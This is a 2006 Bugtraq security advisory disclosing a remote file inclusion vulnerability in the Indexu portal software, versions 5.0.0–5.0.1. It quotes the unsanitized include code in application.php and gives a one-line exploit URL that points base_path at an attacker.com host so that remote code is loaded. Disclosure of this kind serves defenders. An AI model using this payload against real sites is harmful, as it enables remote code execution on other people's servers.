[ECHO_ADV_27$2006] Indexu <= 5.0.1 Remote File Inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [ECHO_ADV_27$2006] Indexu <= 5.0.1 Remote File Inclusion
From: eufrato@xxxxxxxxx
Date: 9 Feb 2006 07:09:42 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \  
 |    __)_ /    \  \//    ~    \/   |   \ 
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ 

                                        .OR.ID
ECHO_ADV_27$2006

---------------------------------------------------------------------------
[ECHO_ADV_27$2006] Indexu <= 5.0.1 Remote File Inclusion
---------------------------------------------------------------------------

Author       : M.Hasran Addahroni
Date         : February, 9th 2006
Location     : Indonesia, Bali
Web          : http://echo.or.id/adv/adv27-K-159-2006.txt
Critical Lvl : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Indexu

Application : indexu 
version     : 5.0.0 5.0.1
URL         : http://www.nicecoder.com/
Description :

INDEXU is a portal solution software that allows you to build powerful indexing 
websites such as yahoo.com, google.com, and dmoz.org with ease. It's ability to 
allow you and your members to easily add, organize, and manage your links makes 
INDEXU the first choice of all webmasters. 

---------------------------------------------------------------------------

Proof of Concept:
~~~~~~~~~~~~~~~~

in application.php code script i found include fopen url
vulnerability that not sanitized.an attacker can exploit this vulnerability 
with a simple php injection script.Here is the code of application.php

---------------application.php--------------------------------
 ...
include($base_path."lang/english.php");   // full path
include($base_path."pagination.class.php");   // full path

...
------------------------------------------------------------------

Exploit:
~~~~~~~~

http://www.target.com/[path]/application.php?base_path=http://attacker.com/evil?

Solution:
~~~~~~~~~

sanitize the script code in application.php to protect this vulerability

Notification:
~~~~~~~~~~~~

 vendor was contact

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ sinChan,x`shell,tety,sakitjiwa
~ newbie_hacker@xxxxxxxxxxxxxxx 
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Prev by Date: [SECURITY] [DSA 966-1] New adzapper packages fix denial of service
Next by Date: [security bulletin] SSRT051007 rev.2 - HP Tru64 UNIX Running DNS BIND4/BIND8 with Forwarders: Remote Unauthorized Privileged Access
Previous by thread: [SECURITY] [DSA 966-1] New adzapper packages fix denial of service
Next by thread: Re: [ECHO_ADV_27$2006] Indexu <= 5.0.1 Remote File Inclusion
Index(es):
- Date
- Thread